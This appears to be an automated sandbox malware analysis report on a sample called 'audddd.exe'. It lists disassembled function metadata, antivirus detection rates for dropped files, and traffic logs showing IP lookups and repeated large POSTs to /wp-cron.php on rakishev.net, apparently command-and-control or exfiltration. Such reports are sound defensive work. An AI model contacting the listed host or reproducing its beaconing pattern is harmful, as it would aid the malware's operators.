API String ID: 2870079774-0
Opcode ID: 3f57446dfe19a26bbf9dc81d634d95c6cb1ed2a60466699f83d4206c4e122108
Instruction ID: 715ca40d94cdd5c9c6ae78369189d1045d8a96e406e9af6c90f39ad8511f50d1
Opcode Fuzzy Hash: 3f57446dfe19a26bbf9dc81d634d95c6cb1ed2a60466699f83d4206c4e122108
Instruction Fuzzy Hash: 8C1136B58003099FDB60CF9AD988BDFBFF8EB48324F208459E418A7600C374A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0712E9E8 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(017C4708,0000040A,?,?), ref: 0712EA58

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b28eb03856c4cf2990c902e1c3fd9b7d08dfe91fc55de51289cef26601499221
Instruction ID: c78f8a3edab5acd66cdeb962052d422808db15ad7e4870776f9b81456abc3fe3
Opcode Fuzzy Hash: b28eb03856c4cf2990c902e1c3fd9b7d08dfe91fc55de51289cef26601499221
Instruction Fuzzy Hash: D51146B18002499FCB21CF9AD984BDEBFF8FB89320F208459E468A7250C335A554CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0712C401 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0712B5BF), ref: 0712C465

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 645f8f19d7a0368616790c024006332300a86a756d40d67d18c228c7df484ce4
Instruction ID: 301a6e099816979d9ad85a397841c12925bbe63890d4d1a964259aec1d3ecece
Opcode Fuzzy Hash: 645f8f19d7a0368616790c024006332300a86a756d40d67d18c228c7df484ce4
Instruction Fuzzy Hash: 601125B1C00259CFCB10CFAAD844BDEFBF4EB49320F24845AD458A7200D334A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06976C00 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,054E6408,?,?,?,?,?,?,069780A8,00000000,00000000,?), ref: 0697823D

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: e34517802ba0a5bcd9ed9a5570fd5fa033c628908c06eef05cf018c713e9e948
Instruction ID: a765c6be90e6f6dd6f8d000cfd88a5a28b320426d636d46035c3d8bb72750de1
Opcode Fuzzy Hash: e34517802ba0a5bcd9ed9a5570fd5fa033c628908c06eef05cf018c713e9e948
Instruction Fuzzy Hash: B31118B58003099FDB50DF9AD988BDEBFF8EB48360F208459E515A7600C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0639E254 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0639F3F5

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 58ed1b3252aa7aa225b8bed5448bad2f74b29d3cdc7f60872eed18648937dc5d
Instruction ID: 9dae904c10a0902d378b48a64e47ce8a2f1f2f5399bff472bec958ec53a4fd8c
Opcode Fuzzy Hash: 58ed1b3252aa7aa225b8bed5448bad2f74b29d3cdc7f60872eed18648937dc5d
Instruction Fuzzy Hash: A91118B18003498FDB60DF9AD984B9EBFF8EB48324F248459D418E7610D378A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0712A33C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0712B5BF), ref: 0712C465

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: d17ace4f8bd13120621dfe83ff39e6834f33c0d52500d5c83d8c3bb45619f8dc
Instruction ID: d087d7f7bd23d5953028e51bb318ee17ade73325873b03573fe54225b92ce947
Opcode Fuzzy Hash: d17ace4f8bd13120621dfe83ff39e6834f33c0d52500d5c83d8c3bb45619f8dc
Instruction Fuzzy Hash: 411122B1C002598FCB24CF9AD984B9EBBF4EB48320F20842AE418A7200D374A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0639F398 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0639F3F5

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 64ea49958dbbe356dd7bc6e5c970505e5d73972ed0a4c015216030b63b37e4e4
Instruction ID: 5499107a08dd08e3578cf92db806b0f01713070584635af6c0275d7f27c61fda
Opcode Fuzzy Hash: 64ea49958dbbe356dd7bc6e5c970505e5d73972ed0a4c015216030b63b37e4e4
Instruction Fuzzy Hash: CC1118B1C003498FCB20DF9AD944B9EBFF4EF88324F24845AD458A7610C374A584CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 017BD1D8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129709125.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_17bd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3f3347e5a320acbf370802f27c163c54643b4c85fd752c64e54b654a77c4c36
Instruction ID: 3547e481771be39f066c6da4160f0d5e4084e3f8b52c64343347e0a5bf203042
Opcode Fuzzy Hash: b3f3347e5a320acbf370802f27c163c54643b4c85fd752c64e54b654a77c4c36
Instruction Fuzzy Hash: 8E21F871508280DFDB15CF94D9C4B96FFA5FB88328F24C5A9ED094B246C33AD456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 017CE2E1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129734265.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_17cd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b8a0a08338b450f2682189cf25bc9e652c13c2117c3a602730494a2bfc5fb6
Instruction ID: 7cf52db92b2089afc883be46c51e02f20ce2c9297670cbaf13455afcaf8ed4c6
Opcode Fuzzy Hash: 40b8a0a08338b450f2682189cf25bc9e652c13c2117c3a602730494a2bfc5fb6
Instruction Fuzzy Hash: 1A2183755083809FC706CF18D990715BF71EB46714F28C5EED8858B667C33AE856CB62

Uniqueness

Uniqueness Score: -1.00%

Function 017BD3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129709125.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_17bd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c581459c3f65081f4607ad8210459e59f79ca5602b37f142030e4cf9f98317d7
Instruction ID: 6ee4180206c582a1401eff0eaebf5fcabe6b74e5ddc70e09d3d6f58c821b5206
Opcode Fuzzy Hash: c581459c3f65081f4607ad8210459e59f79ca5602b37f142030e4cf9f98317d7
Instruction Fuzzy Hash: F42103B1504240DFDB25DF58D9C0B96FFA5EB88328F24C5A9EC094B246C33AE456CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 017CE31C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129734265.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_17cd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7efb678d99abec744a85f97f47de33690c116bcc1fcbc5f9b686fbd7deb9745
Instruction ID: 7f6f246a25a19663dd0dfbbf8e60586057452d5fd1a1cd64866e6615eccfc80e
Opcode Fuzzy Hash: e7efb678d99abec744a85f97f47de33690c116bcc1fcbc5f9b686fbd7deb9745
Instruction Fuzzy Hash: E821C575604240DFDB05DF18D9C0B16FFA5EB84714F24C5ADE84A4B356CB3AE846CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 017CE50C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129734265.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_17cd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b8a6852c2020be694bc362af1e9bba8c011187bf9898ea927f1c4eae891c97
Instruction ID: a7a37305afde1039b0c2eecc86729e8adcd28ff4100c9abb9878b53eded5e161
Opcode Fuzzy Hash: 60b8a6852c2020be694bc362af1e9bba8c011187bf9898ea927f1c4eae891c97
Instruction Fuzzy Hash: 3E212675504244DFDB01CF18EDC0B26FFA5EB94B24F34C5ADE8494B246EB3AD446CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 017BD1D3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129709125.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_17bd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7293a8a996a9933c11cb2e358c381ae75aadffb26ef6baec95c3adea0869ec6
Instruction ID: 8ad397e4e36cf70539fc86e912cefaa715857cdb9cfe1dc90a3851224c6473f4
Opcode Fuzzy Hash: f7293a8a996a9933c11cb2e358c381ae75aadffb26ef6baec95c3adea0869ec6
Instruction Fuzzy Hash: 8F21AE76504280CFDB16CF44D9C4B56FF61FB84324F2485A9DC084A656C33AD45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 017BD3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129709125.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_17bd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f04dc84d66a0d42e145680352e01869c8a854c043734d5ebef4747bd96dbcb
Instruction ID: c481211652d9c55d70c05327d169e512436ee96cbda5fd4d014afce8ed82744b
Opcode Fuzzy Hash: f2f04dc84d66a0d42e145680352e01869c8a854c043734d5ebef4747bd96dbcb
Instruction Fuzzy Hash: 03119D76504280CFDB16CF54D9C4B96BF71FB84328F24C5A9DC494B616C33AE45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 017CE507 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1129734265.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_17cd000_audddd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076f631c226bf6dbecb897e300abd939870013a3f5719c2a59eef717838c0dc0
Instruction ID: 554264514619428e114efc7268d021247ae6dd1d15c7c6b2d2ce7ff1a187ca1d
Opcode Fuzzy Hash: 076f631c226bf6dbecb897e300abd939870013a3f5719c2a59eef717838c0dc0
Instruction Fuzzy Hash: 2C11BB76504284CFDB02CF14E9C4B15FF61EB84720F28C6AED8484B646D33AD44ACBA2

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Users\user\AppData\Local\Temp\tmpG47.tmp (copy)	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	ReversingLabs: Detection: 68%

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 310Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 558Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 868Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112854Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 326Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112852Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 326Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 310Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 558Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112852Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 326Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112852Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112852Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112822Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 324Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 118294Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112820Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112820Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112820Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112878Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 328Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 326Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112878Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 326Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 112878Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 324Expect: 100-continue
